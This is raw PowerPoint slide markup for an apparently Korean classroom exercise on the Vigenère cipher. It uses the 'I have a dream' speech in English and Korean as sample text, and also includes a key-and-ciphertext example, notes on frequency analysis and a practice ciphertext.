              <a:t>I have a dream that one day even the state of Mississippi, a state sweltering with the heat of oppression, will be transformed into an oasis of freedom and justice.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>I have a dream that my four little children will one day live in a nation where they will not be judged by the color of their skin but by their character.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>I have a dream today.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>I have a dream that one day down in Alabama, with its vicious racists, with its governor having his lips dripping with the words of interposition and nullification; that one day right down in Alabama little black boys and black girls will be able to join hands with little white boys and white girls as sisters and brothers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>I have a dream today.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>I have a dream that one day every valley shall be engulfed, every hill shall be exalted and every mountain shall be made low, the rough places will be made plains and the crooked places will be made straight and the glory of the Lord shall be revealed and all flesh shall see it together.</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절망의 계곡에서 뒹굴 지 말자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>친구 여러분</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>오늘과 내일의 어려움이 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>아직 꿈이 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>아메리칸 드림에 깊이 뿌리 박힌 꿈입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>언젠가는이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 나라가 일어 서서 그 신조의 진정한 의미를 실천하는 꿈이 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>우리는 모든 사람이 평등하게 창조되었다는 자명 한 진리를 가지고 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>언젠가 조지아의 붉은 언덕에서 전 노예의 아들들과 전 노예 소유주의 아들들이 형제애의 식탁에 함께 앉을 수 있다는 꿈이 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>언젠가는 억압의 열기로 무더운 미시시피 주조차도 자유와 정의의 오아시스로 변모 할 것이라는 꿈이 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>내 네 명의 어린 자녀들이 피부색이 아닌 성격으로 판단되는 나라에서 언젠가 살게 될 꿈이 있습니다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나는 언젠가 앨라배마 주에서 악랄한 인종 차별 주의자들과 함께</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>그 주지사가 개입과 무효화라는 말로 입술이 뚝뚝 떨어지는 꿈을 꾸었습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>언젠가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>알라바마에서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 작은 흑인 소년들과 흑인 소녀들이 자매이자 형제로서 백인 소년들과 백인 소녀들과 손을 잡을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>수있게</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 될 것입니다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언젠가는 모든 계곡이 휩싸이고 모든 산이 고양되고 모든 산이 낮아지고 거친 곳이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>평지가되고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>구불</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>구불</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 한 곳이 곧게 펴지고 주님의 영광이 드러날 것이라는 꿈이 있습니다 모든 육체는 그것을 함께 볼 것입니다</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005433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/Theory/T4/Vigenere</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>비즈네르</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> 암호</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8194" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{819EE01E-EDA9-4FC9-8BBE-F550D18986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748" y="2623235"/>
            <a:ext cx="5795944" cy="47421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비제네르 표 예시 설명">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8BA64F4-A8D4-4581-93DC-84F05B473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9" y="1849333"/>
            <a:ext cx="6133391" cy="4568024"/>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DC38C039-9D27-4916-B4B3-1D7BFA1683CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1004207" y="2038169"/>
            <a:ext cx="228599" cy="4362860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FDDF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4D0653C-D35D-402D-8AF5-FD2D13A9286B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6340755" y="3155421"/>
            <a:ext cx="4615094" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>divert troops to east ridge =&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>vstwbrlbmgzqlycscrjsbyo</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2206A4D5-6703-4CDA-A329-9AABE5831DCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10955849" y="3155420"/>
            <a:ext cx="1329180" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F743BB"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Key = SKY</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F743BB"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D75CB736-F76B-498F-AA76-AA9EBDF9EDC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6272748" y="3521168"/>
            <a:ext cx="6080288"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같은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'o'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>에 대해서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'M','G','Y'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>세가지가 나온 것을 알 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>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빈도분석법으로는 해독이 불가능</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="202122"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>평문이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 아주 길며</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>키의 길이를 안다고 가정했을 시 빈도분석법 가능</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{129849F9-5019-46F5-8FDB-B6B2AE2B7D9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="6492875"/>
            <a:ext cx="5257801" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>비즈네르</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t> 표</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>.    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F743BB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ex)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t> ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>원문 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>“d”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>키워드 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>“S” ) -&gt; ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>암호문</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t> “V” ) </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="그룹 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DC2AB88-F7FD-4978-8998-EDE8879BE53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59373F8C-9C85-4DA7-99AC-B2FA3A727E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7817CEC-C581-48B1-B817-C22AA9CAF9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B7013C82-DA34-4FC3-A9AA-AAF007DAC4F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5" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8F8F646-AB56-440C-BD76-0244B5BAD501}"/>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86351857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br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>고전암호 실습 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>비즈네르</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="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navy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실행 단추: 문서 32">
            <a:hlinkClick r:id="rId7" action="ppaction://hlinkfile"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83ECB9B8-A291-4B2D-9A33-A70907E66877}"/>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화살표: 오른쪽 33">
            <a:hlinkClick r:id="rId8" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4073BB20-B23B-4352-ADB2-AD789401F76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5409201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RNDEZADQNHDEULTRRCCLVCVJYYYCFIBLRDHYPHDLRTCCCRJZYEHGFWZYEEOPLIIEGOWCNTOFVSHYPHDLRWDRUHPKNNNUUAOGSOIJLOOFRRHYPHDLRSXMHLYZRAORUINKNCCGAENMZEOGZENQBMZMAETMHNZTRRZTRNOFBUBFGOAZRCVSFEOFRYYMGHDLTSOFNTIMBNZRUOPEUTJD</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211EABFD-2D0A-4F9D-857A-0632046546CF}"/>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40F77D7-602A-485B-B104-4F59BB8EF1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69611C42-822E-4427-85A4-DC34225A12F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7433FF0-4A30-4EDE-8222-4B5AB5A8B30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193FAE9-065B-4D58-935B-02084A31775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288513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키와 암호문을 복사 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>붙혀넣기</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 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8D441FC0-3FF2-45C1-9314-CDB4120A70C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="923304" y="1105065"/>
            <a:ext cx="4143375" cy="3009900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="그룹 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main"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96370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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>단위과제</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9C136229-DC6D-4832-AE41-633A488FB1A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3912196076"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1200647" y="1690688"/>
          <a:ext cx="8696217" cy="4915353"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="791155">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2591050968"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="791155">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="154879271"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="591744">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="813017851"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="761651">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3701053458"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="761651">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2491820619"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="650752">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3287896795"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="795758">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3972815226"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="795758">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1427950572"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="582538">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="667526490"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="746377">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2599313690"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="746377">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="936026796"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="681301">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3876049538"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
